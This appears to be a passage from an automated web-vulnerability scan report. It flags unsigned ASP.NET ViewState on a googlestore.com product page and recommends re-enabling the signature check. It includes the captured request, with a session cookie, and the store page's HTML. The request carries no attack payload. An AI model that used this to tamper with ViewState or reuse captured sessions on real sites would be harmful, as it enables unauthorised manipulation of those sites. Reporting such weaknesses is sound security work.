By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

2.1. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Wearables/Organic+Black+is+Back+T-Shirt.axd

Request

POST /Wearables/Organic+Black+is+Back+T-Shirt.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.12.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Content-Type: application/x-www-form-urlencoded
Content-Length: 444

__VIEWSTATE=%2FwEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwL5t4CVDgKc3s3hCgKHlcOwBw%3D%3D&Template%24ctlRightNav%24ctlSignup%24EmailAddress=cdd&Template%24ctlRightNav%24ctlSignup%24btnSignUp.x=25&Template%24ctlRightNav%24ctlSignup%24btnSignUp.y=4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37058
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:59:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Organic Black is Back T-Shirt</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_on.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a><ul class="item_list"><li><a href="/Wearables/Tiki+Android+T-Shirt.axd">Tiki Android T-Shirt</a></li><li><a href="/Wearables/Google+Wallet+Full-Zip+Hoodie.axd">Google Wallet Full-Zip Hoodie</a></li><li><a href="/Wearables/Google+Circles+T-Shirt+White.axd">Google+ Circles T-Shirt White</a></li><li><a href="/Wearables/Google+Circles+T-shirts+Navy.axd">Google+ Circles T-shirts Navy</a></li><li><a href="/Wearables/Ladies+Full+Zip+Hoodie+with+Woman+s+Logo.axd">Ladies' Full Zip Hoodie with Woman's Logo</a></li><li><a href="/Wearables/Android+Concert+T-Shirt.axd">Android Concert T-Shirt</a></li><li><a href="/Wearables/Ladies+Glow+in+the+Dark+Ink+Tee.axd">Ladies Glow in the Dark Ink Tee</a></li><li><a href="/Wearables/Ladies+Lite+Color-Block+Jacket.axd">Ladies Lite Color-Block Jacket</a></li><li><a href="/Wearables/Gmail+Cap.axd">Gmail Cap</a></li><li><a href="/Wearables/Go+Gopher+T-Shirt.axd">Go Gopher T-Shirt</a></li><li><a href="/Wearables/Google+TV+T-Shirt.axd">Google TV T-Shirt</a></li><li><a href="/Wearables/Gmail+Full+Zip+Fleece.axd">Gmail Full Zip Fleece</a></li><li><a href="/Wearables/Honeycomb+Navy+T-Shirt.axd">Honeycomb Navy T-Shirt</a></li><li><a href="/Wearables/Honeycomb+White+T-Shirt.axd">Honeycomb White T-Shirt</a></li><li><a href="/Wearables/Google+Earth+Tee.axd">Google Earth Tee</a></li><li><a href="/Wearables/Android+Dragon+T-Shirt.axd">Android Dragon T-Shirt</a></li><li><a href="/Wearables/Champion+Polyester+Mesh+Shorts.axd">Champion Polyester Mesh Shorts</a></li><li><a href="/Wearables/Organic+Cotton+Android+walking+with+dog+T-shirt.axd">Organic Cotton Android walking with dog T-shirt</a></li><li><a href="/Wearables/Flexfit+Cap+L+XL+-+Dark+Grey.axd">Flexfit Cap L/XL - Dark Grey</a></li><li><a href="/Wearables/Gmail+Tuxedo+Tee.axd">Gmail Tuxedo Tee</a></li><li><a href="/Wearables/Men+s+4+oz+Triblend+T-Shirt.axd">Men's 4 oz. Triblend T-Shirt</a></li><li><a href="/Wearables/Men+s+Lombard+Thermal+T-Shirt.axd">Men's Lombard Thermal T-Shirt</a></li><li><a href="/Wearables/Ladies+Black+is+Back+T-Shirt.axd">Ladies Black is Back T-Shirt</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Cotton+T-shirt.axd">Long Sleeve Organic Cotton T-shirt</a></li><li><a href="/Wearables/Ladies+Bella+Favorite+T-Shirt+in+4+colors.axd">Ladies Bella Favorite T-Shirt in 4 colors</a></li><li><a href="/Wearables/Men+s+Lite+Color-Block+Jacket.axd">Men's Lite Color-Block Jacket</a></li><li><a href="/Wearables/Ladies+Bella+V-Neck+T-Shirt.axd">Ladies Bella V-Neck T-Shirt</a></li><li><a href="/Wearables/Canvas+3+Button+Polo.axd">Canvas 3 Button Polo</a></li><li><a href="/Wearables/Triblend+Full+Zip+Hoodie.axd">Triblend Full Zip Hoodie</a></li><li><a href="/Wearables/Structured+Low+Profile+6+Panel+Cap.axd">Structured Low Profile 6 Panel Cap</a></li><li><a href="/Wearables/Chrome+Visor.axd">Chrome Visor</a></li><li><a href="/Wearables/Peninsula+Jacket.axd">Peninsula Jacket</a></li><li><a href="/Wearables/Flexfit+Cap+S+M+-+Dark+Grey.axd">Flexfit Cap S/M - Dark Grey</a></li><li><a href="/Wearables/Men+s+Burst+T-Shirt.axd">Men's Burst T-Shirt</a></li><li><a href="/Wearables/Ladies+Burst+T-Shirt.axd">Ladies' Burst T-Shirt</a></li><li><a href="/Wearables/Flip+Flops.axd">Flip Flops</a></li><li><a href="/Wearables/AA+Full+Zip+Hooded+Jacket+with+Gmail+Logo.axd">AA Full Zip Hooded Jacket with Gmail Logo</a></li><li><a href="/Wearables/Android+Cap.axd">Android Cap</a></li><li><a href="/Wearables/Google+Maps+Biking+T-Shirt.axd">Google Maps Biking T-Shirt</a></li><li><a href="/Wearables/Android+Skateboarder+T-Shirt.axd">Android Skateboarder T-Shirt</a></li><li><a href="/Wearables/Android+Restroom+Sign+T-Shirt.axd">Android Restroom Sign T-Shirt</a></li><li><a href="/Wearables/Ladies+Android+Pride+T-Shirt+-+Black.axd">Ladies' Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Android+Pride+T-Shirt+-+Black.axd">Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Sport-Tech+Fleece+Hoodie.axd">Sport-Tech Fleece Hoodie</a></li><li><a href="/Wearables/Anvil+Full+Zip+Organic+Hoodie.axd">Anvil Full Zip Organic Hoodie</a></li><li><a href="/Wearables/Alo+Ladies+Half-Zip+Pullover.axd">Alo Ladies Half-Zip Pullover</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Jacket-Red.axd">Ladies Soft Shell Jacket-Red</a></li><li><a href="/Wearables/Unisex+1+4+Zip+Fleece.axd">Unisex 1/4 Zip Fleece</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Crew.axd">Long Sleeve Organic Crew</a></li><li><a href="/Wearables/Full+Zip+Men+s+Fleece.axd">Full Zip Men's Fleece</a></li><li><a href="/Wearables/Ladies+Full+Zip+Fleece.axd">Ladies Full Zip Fleece</a></li><li><a href="/Wearables/Ladies+Thermal+Shirt.axd">Ladies Thermal Shirt</a></li><li><a href="/Wearables/Google+Voice+Fleece+Hoodie.axd">Google Voice Fleece Hoodie</a></li><li><a href="/Wearables/Google+Voice+T-shirt.axd">Google Voice T-shirt</a></li><li><a href="/Wearables/Tribeca+Full+Zip+Hoodie.axd">Tribeca Full Zip Hoodie</a></li><li><a href="/Wearables/Ladies+Android+Heart+T-Shirt.axd">Ladies Android Heart T-Shirt</a></li><li><a href="/Wearables/Ladies+Organic+Tee+-+Black.axd">Ladies' Organic Tee - Black</a></li><li><a href="/Wearables/Beanie+-+Navy+with+Ivory.axd">Beanie - Navy with Ivory</a></li><li><a href="/Wearables/Pro+Mesh+Cap+-+Black.axd">Pro Mesh Cap - Black</a></li><li><a href="/Wearables/Sport-Tek+Track+Jacket.axd">Sport-Tek Track Jacket</a></li><li><a href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd">Organic Cotton Long Sleeve T-Shirt</a></li><li><a class="product_on" href="/Wearables/Organic+Black+is+Back+T-Shirt.axd">Organic Black is Back T-Shirt</a></li><li><a href="/Wearables/Organic+Basic+T-Shirt.axd">Organic Basic T-Shirt</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Red.axd">Organic Cotton T-Shirt - Red</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd">Organic Cotton T-Shirt - Grey</a></li><li><a href="/Wearables/Android+American+Apparel+Polo.axd">Android American Apparel Polo</a></li><li><a href="/Wearables/Organic+Cotton+Contrast+Stitch+Cap.axd">Organic Cotton Contrast Stitch Cap</a></li><li><a href="/Wearables/American+Apparel+Google+Polo.axd">American Apparel Google Polo</a></li><li><a href="/Wearables/Organic+Cotton+Basic+Crew+-+Unisex.axd">Organic Cotton Basic Crew - Unisex</a></li><li><a href="/Wearables/Chrome+T-Shirt.axd">Chrome T-Shirt</a></li><li><a href="/Wearables/Ladies+Bamboo+Tee.axd">Ladies Bamboo Tee</a></li><li><a href="/Wearables/Organic+Cotton+Cap+-+Black.axd">Organic Cotton Cap - Black</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Hooded+Jacket.axd">Ladies Soft Shell Hooded Jacket</a></li><li><a href="/Wearables/Organic+Beanie.axd">Organic Beanie</a></li><li><a href="/Wearables/Men+s+Puffy+Vest.axd">Men's Puffy Vest</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Rasta.axd">Men's Bike Jersey - Rasta</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Android.axd">Men's Bike Jersey - Android</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Rasta.axd">Ladies Bike Jersey - Rasta</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Android.axd">Ladies Bike Jersey - Android</a></li><li><a href="/Wearables/Men+s+Akasha+Jacket.axd">Men's Akasha Jacket</a></li><li><a href="/Wearables/Google+Map+T-Shirt.axd">Google Map T-Shirt</a></li><li><a href="/Wearables/Men+s+Plasma+Schell+Jacket.axd">Men's Plasma Schell Jacket</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Android.axd">Classic Men's Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Android.axd">Classic Men's Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Rasta.axd">Classic Men's Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Rasta.axd">Classic Men's Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Android.axd">Classic Ladies Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Android.axd">Classic Ladies Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Rasta.axd">Classic Ladies Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Rasta.axd">Classic Ladies Shorts - Rasta</a></li></ul></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Wearables</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Wearables/">Wearables</a>
</div>
   <div id="product_info">

<script type="text/javascript" src="/js/style.js"></script>
<script type="text/javascript">
var styleProducts = new Array();
var styleDescriptions = new Array();

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

function swatchImageClick(color)
{
   var fld = document.forms['frmProductDetails']['l2desc'];

   for(i = 0; i < fld.options.length; i++)
   {
       if (fld.options[i].value == color)
       {
           fld.selectedIndex = i;
           break;
       }
   }

   styleOnChange('frmProductDetails', '','10 13000 ', 2, 2, true);
}
</script>

<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<table border="0" cellpadding="10" cellspacing="0" width="100%" class="product_table">
<tr>
   <td valign="top" width="200">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/go13052a.jpg" alt="" />
</a>
<img class="ecotags" src="/images/greeninitiative/organic_s.jpg" title="Made from materials grown without the use of harmful synthetic chemicals.">

<img style="position:absolute; top:0px;right:2px;" src="/content/Images/flagUSA.JPG" alt="Made In USA" title="Made In USA">

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)" class="enlarge">Enlarge image</a>

<a style="float:right" onclick="click('Size Chart')" href="javascript:newWindow('/sizechart.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208&itemno=10 13000',600,600,true)" class="enlarge">Size chart</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><a id="/content/Images/Large/01BlkisBkTeeBack.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="0" style="border:1px solid #eee;" src="/content/Images/SuperThumb/01BlkisBkTeeBackC.jpg" alt=""></a><a id="/content/Images/Large/BlkT1.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="1" style="border:1px solid #eee;" src="/content/Images/SuperThumb/BlkT1C.jpg" alt=""></a><a id="/content/Images/Large/BlkT2.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fgo13052.jpg&edp_no=7208',420,600)"><img id="2" style="border:1px solid #eee;" src="/content/Images/SuperThumb/BlkT2C.jpg" alt=""></a><img id="i0" src="/content/Images/Standard/01BlkisBkTeeBackA.jpg" style="display:none;" /><img id="i1" src="/content/Images/Standard/BlkT1A.jpg" style="display:none;" /><img id="i2" src="/content/Images/Standard/BlkT2A.jpg" style="display:none;" /></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/go13052a.jpg");
});
</script>

</td>
        <td valign="top" class="product_details">
<h2>Organic Black is Back T-Shirt</h2>
        <b>Item #:</b> 10 13000<br /><br />
<p class="blocktext">Word on the street is that "black is the new black". Embellish your basic fashion statement with Google's brightly colored logo on an authentic American Apparel 100% organic combed cotton t-shirt for ultimate softness. This t-shirt has a flattering and stylish fit for virtually any body type. Features also include a baby rib cotton stretchable, reinforced shoulder construction to maintain shape through repeated washings and a durable double-stitched bottom hem. 4 color logo screened on front.

Sizes run smaller than normal. Please reference men's size chart for fit.</p>

        <div class="price">
<b>Price:</b> $17.20
</div>







<div class="product_colors">
<b>Available Colors:</b><br />
<ul>

                        <li>
                        <a href="javascript:swatchImageClick('BLACK');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/BLACK.jpg" alt="BLACK" width="20" height="20" border="0"></a>
                           </li>

</ul>
</div>

<table cellpadding="0" cellspacing="0">
<tr>
            <td colspan="2">

<script type="text/javascript" src="/js/prototype/style.js"></script>
<script lang="javascript">
styleProducts['10 13000 '] = new Array();

styleProducts['10 13000 '][0] = new Array("S","BLACK","BLACK", "$17.20" , "125", " In stock");

styleProducts['10 13000 '][1] = new Array("M","BLACK","BLACK", "$17.20" , "248", " In stock");

styleProducts['10 13000 '][2] = new Array("L","BLACK","BLACK", "$17.20" , "164", " In stock");

styleProducts['10 13000 '][3] = new Array("XL","BLACK","BLACK", "$17.20" , "136", " In stock");

styleProducts['10 13000 '][4] = new Array("2XL","BLACK","BLACK", "$19.30" , "136", " In stock");

styleProducts['10 13000 '][5] = new Array("3XL","BLACK","BLACK", "$21.95" , "43", " In stock");

styleDescriptions['10 13000 '] = new Array();

styleDescriptions['10 13000 '][1] = 'Size';

styleDescriptions['10 13000 '][2] = 'Color';

</script>

<table cellpadding="0" cellspacing="0" id="style_controls">
<tr>

<td><b>Size</b></td>

<td><b>Color</b></td>

<td><b>Qty</b></td>
</tr>
<tr>

<td><select id="" class="l1desc" name="l1desc" onchange="changeStyleMessage('frmProductDetails', 'l1desc','10 13000 ', 1, 2, true)">

<option id="" value="S" selected>S</option>

<option id="" value="M">M</option>

<option id="" value="L">L</option>

<option id="" value="XL">XL</option>

<option id="" value="2XL">2XL</option>

<option id="" value="3XL">3XL</option>

</select>
</td>

<td><select id="" class="l2desc" name="l2desc" onchange="changeStyleMessage('frmProductDetails', 'l2desc','10 13000 ', 2, 2, true)">

<option id="" value="BLACK" selected>BLACK - $17.20</option>

</select>
</td>

<td>
<select name="qty">

<option>0</option>

<option selected>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

<option>32</option>

<option>33</option>

<option>34</option>

<option>35</option>

<option>36</option>

<option>37</option>

<option>38</option>

<option>39</option>

<option>40</option>

<option>41</option>

<option>42</option>

<option>43</option>

<option>44</option>

<option>45</option>

<option>46</option>

<option>47</option>

<option>48</option>

<option>49</option>

<option>50</option>

<option>51</option>

<option>52</option>

<option>53</option>

<option>54</option>

<option>55</option>

<option>56</option>

<option>57</option>

<option>58</option>

<option>59</option>

<option>60</option>

<option>61</option>

<option>62</option>

<option>63</option>

<option>64</option>

<option>65</option>

<option>66</option>

<option>67</option>

<option>68</option>

<option>69</option>

<option>70</option>

<option>71</option>

<option>72</option>

<option>73</option>

<option>74</option>

<option>75</option>

<option>76</option>

<option>77</option>

<option>78</option>

<option>79</option>

<option>80</option>

<option>81</option>

<option>82</option>

<option>83</option>

<option>84</option>

<option>85</option>

<option>86</option>

<option>87</option>

<option>88</option>

<option>89</option>

<option>90</option>

<option>91</option>

<option>92</option>

<option>93</option>

<option>94</option>

<option>95</option>

<option>96</option>

<option>97</option>

<option>98</option>

<option>99</option>

<option>100</option>

</select>
</td>
</tr>

<tr><td colspan="5"><span id="inventoryStatusMessage">
Select your Color/Size Combination
</span></td></tr>

</table>
<br /><br />

            </td>
        </tr>
        <tr>
            <td></td>
            <td>

<table cellpadding="0" cellspacing="0">
<tr>
<td align="left">

<a href="http://www.googlestore.com/Wearables/cid=447/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" type="image" src="/images/btn_addtocart.gif" onclick="click('Add To Cart')" border="0" />

</td>
</tr>
</table>
</td>
</tr>
    </table>
   </td>
</tr>
</table>
   <input type="hidden" name="type" value="S">

<input type="hidden" name="cid" value="447">

<input type="hidden" name="style_id" value="10 13000 ">
<input type="hidden" name="edp_no" value="7208">

</form>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Android Restroom Sign T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Android+Restroom+Sign+T-Shirt.axd"><img src="/content/images/thumb/10-13064b.jpg" alt="Android Restroom Sign T-Shirt" /></a>
<div class="price">
<b>Price:</b> $12.65
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Android Restroom Sign T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Android+Restroom+Sign+T-Shirt.axd">Android Restroom Sign T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Basic T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Basic+T-Shirt.axd"><img src="/content/images/thumb/go13053b.jpg" alt="Organic Basic T-Shirt" /></a>
<div class="price">
<b>Price:</b> $18.25
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Basic T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Basic+T-Shirt.axd">Organic Basic T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Cotton T-Shirt - Grey : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd"><img src="/content/images/thumb/10 13008b.jpg" alt="Organic Cotton T-Shirt - Grey" /></a>
<div class="price">
<b>Price:</b> $13.40
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Cotton T-Shirt - Grey : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd">Organic Cotton T-Shirt - Grey</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Organic Cotton Long Sleeve T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd"><img src="/content/images/thumb/10-13091b.jpg" alt="Organic Cotton Long Sleeve T-Shirt" /></a>
<div class="price">
<b>Price:</b> $16.00
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Organic Cotton Long Sleeve T-Shirt : Organic Black is Back T-Shirt');" href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd">Organic Cotton Long Sleeve T-Shirt</a>
</li>

</ul>
</div>



   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1013000" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="formerror">Invalid Email Format</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYEZg8PFgYeCENzc0NsYXNzBQlmb3JtZXJyb3IeBFRleHQFFEludmFsaWQgRW1haWwgRm9ybWF0HgRfIVNCAgJkZAIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUoVGVtcGxhdGUkY3RsUmlnaHROYXYkY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLW3u3tDwKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
